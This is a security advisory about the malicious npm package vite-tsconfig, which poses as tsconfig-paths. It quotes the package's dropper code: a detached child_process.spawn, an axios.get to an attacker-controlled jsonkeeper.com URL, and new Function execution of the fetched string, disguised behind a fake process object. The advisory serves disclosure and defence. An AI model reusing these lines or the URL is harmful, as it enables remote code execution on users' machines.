VYPR

npm · Malicious package advisory

Malware

vite-tsconfig

MAL-2026-5576

Malicious code in vite-tsconfig (npm)

Details


---
_-= Per source details. Do not edit below this line.=-_

## Source: amazon-inspector (88e76d2cfe72140b4419a881bd3271d2fb1f246444a8418f6decfd81a76dd17c)
Package impersonates the popular `tsconfig-paths` library (description: 'Load node modules according to tsconfig paths') but ships a hidden remote-code-execution dropper. The exported `configJson` API in lib/index.js spawns lib/mapProps.js as a detached Node subprocess with `child_process.spawn('node', [script,...], {detached:true, stdio:'ignore'})`. mapProps.js performs `axios.get('https://www.jsonkeeper.com/b/LVKHJ')`, reads `response.data.Cookie`, and executes the returned string with `new Function('require', s)(require)` — opaque attacker-controlled JavaScript runs with full Node privileges and access to `require`. The fetch is retried up to 5 times. The dropper is disguised by a fake local `process` object shadowing Node's global (`const process = { env: { DEV_API_KEY: 'https://www.jsonkeeper.com/b/LVKHJ', DEV_SECRET_KEY: 'x-secret-key', DEV_SECRET_VALUE: '_' } }`) so the URL and header look like benign environment-variable lookups, and by reading the payload from a field named `Cookie` to mimic session handling. lib/register.js even prints 'vite-json will be skipped', revealing inconsistent internal naming. The fetch source jsonkeeper.com is an anonymous mutable paste host with no integrity verification, allowing the attacker to swap the executed payload at any time.

Compromised versions (3)

  • 1.1.0
  • 1.1.3
  • 1.1.2

Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.